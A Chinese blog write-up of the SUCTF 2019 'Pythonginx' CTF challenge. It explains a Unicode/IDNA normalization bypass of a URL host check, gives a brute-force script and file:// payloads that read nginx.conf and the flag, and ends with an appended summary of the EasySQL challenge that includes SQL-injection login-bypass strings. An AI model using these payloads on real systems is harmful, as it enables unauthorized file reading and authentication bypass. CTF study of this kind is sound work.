[SUCTF 2019]Pythonginx

本文介绍了SUCTF 2019中涉及的Pythonginx挑战,通过分析源码和理解特定函数的作用,特别是针对host的条件判断,作者展示了如何构造爆破脚本来逃逸并找到有效的payload。最终,文章揭示了成功后的flag,并提供了相关nginx配置文件的位置和重要路径。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[SUCTF 2019]Pythonginx

打开链接,得到源码
在这里插入图片描述

@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    #去掉 url 中的空格
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"

用一个例子解释一下一些函数的作用:

>>> from urllib import parse
>>> url = 'http://www.example.com/a?b&c=1#2'
>>> host = parse.urlparse(url).hostname	#urlparse对url进行分割,host等于其中的hostname
>>> parse.urlparse(url)					#查看一下效果
ParseResult(scheme='http', netloc='www.example.com', path='/a', params='', query='b&c=1', fragment='2')
>>> host								#查看host的内容
'www.example.com'
>>> parts = list(parse.urlsplit(url))	#同样的,urlsplit也是分割url,并保存为列表
>>> parts								#查看一下效果
['http', 'www.example.com', '/a', 'b&c=1', '2']
>>> host = parts[1]						#相当于也是取其中的hostname
>>> host
'www.example.com'
>>> finalUrl = parse.urlunsplit(parts).split(' ')[0]	#urlunsplit拼接为url
>>> finalUrl											#查看一下效果
'http://www.example.com/a?b&c=1#2'
>>>

这里总共有三个if语句,前两个要使host!=suctf.cc,最后一个要使host=suctf.cc。

CVE-2019-9636:urlsplit 不处理 NFKC 标准化
CVE-2019-10160:urlsplit NFKD 标准化漏洞

漏洞原理:
用 Punycode/IDNA 编码的 URL 使用 NFKC 规范化来分解字符。可能导致某些字符将新的段引入 URL。
例如,在直接比较中,\ uFF03不等于'#',而是统一化为'#',这会更改 URL 的片段部分。类似地,\ u2100 统一化为'a/c',它引入了路径段。
>>> host = 'suctf.cⅭ'		#注意这里的Ⅽ并不是大写的C,而是一个Unicode码
>>> (host == 'suctf.cc')	#直接比较却不相等
False
>>> (host.encode('idna').decode('utf-8') == 'suctf.cc')	#但是经过idna编码后用utf-8解码后就相等了
True
>>>

接着我们只需要按照getUrl函数写出爆破脚本即可得到我们能够逃逸的构造语句了

from urllib.parse import urlparse,urlunsplit,urlsplit
from urllib import parse
def get_unicode():
    for x in range(65536):
        uni=chr(x)
        url="http://suctf.c{}".format(uni)
        try:
            if getUrl(url):
                print("str: "+uni+' unicode: \\u'+str(hex(x))[2:])
        except:
            pass
 
def getUrl(url):
    url=url
    host=parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return False
    parts=list(urlsplit(url))
    host=parts[1]
    if host == 'suctf.cc':
        return False
    newhost=[]
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1]='.'.join(newhost)
    finalUrl=urlunsplit(parts).split(' ')[0]
    host=parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return True
    else:
        return False
 
 
if __name__=='__main__':
    get_unicode()

最后结果
在这里插入图片描述
payload:

file://suctf.cⅭ/usr/local/nginx/conf/nginx.conf

在这里插入图片描述

file://suctf.cⅭ/usr/fffffflag

最后得到flag
在这里插入图片描述

贴上另外部分nginx的配置文件所在位置
配置文件存放目录:/etc/nginx
主配置文件:/etc/nginx/conf/nginx.conf
管理脚本:/usr/lib64/systemd/system/nginx.service
模块:/usr/lisb64/nginx/modules
应用程序:/usr/sbin/nginx
程序默认存放位置:/usr/share/nginx/html
日志默认存放位置:/var/log/nginx

https://zhuanlan.zhihu.com/p/104885386?utm_source=wechat_session
https://www.cnblogs.com/cimuhuashuimu/p/11490431.html

### SUCTF 2019 EasySQL Challenge Writeup #### 背景介绍 SUCTF 2019 的 EasySQL 是一道经典的 SQL 注入题目。该题目的核心在于利用特定的 `sql_mode` 设置来绕过某些安全机制,从而实现注入攻击。 #### 关键技术点分析 在 MySQL 中,通过设置不同的 `sql_mode` 可以改变数据库的行为模式[^1]。对于此题而言,关键在于将 `sql_mode` 设定为 `PIPES_AS_CONCAT`,这会使得双竖线 (`||`) 不再表示逻辑运算中的“或”,而是被解释成字符串连接操作符[^4]。 这种变化允许攻击者构造特殊的输入,在不触发传统防御措施的情况下完成注入。具体来说: - 当 `sql_mode=PIPES_AS_CONCAT` 时,`||` 将用于拼接字符串而不是作为布尔表达式的组成部分; - 利用这一点可以巧妙地构建查询语句,使原本看似无害的数据变成有效的 SQL 片段[^2]; #### 解决方案演示 假设存在如下表结构: ```sql CREATE TABLE users ( id INT NOT NULL AUTO_INCREMENT, username VARCHAR(50), password VARCHAR(50), PRIMARY KEY (id) ); ``` 如果应用程序未对用户提交的内容做充分验证,则可以通过精心设计的参数传递恶意指令给服务器端处理。例如,当登录功能接受用户名和密码时,可尝试以下方式突破认证: ```python username = "admin' || '1" password = "' OR '1'='1" # 构造后的最终查询可能形似这样: query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}';" print(query) # 输出结果将是: # SELECT * FROM users WHERE username='admin'' || '1' AND password='' OR '1'='1'; ``` 由于启用了 `PIPES_AS_CONCAT` 模式,上述代码片段将会成功匹配管理员账户并返回相应记录[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值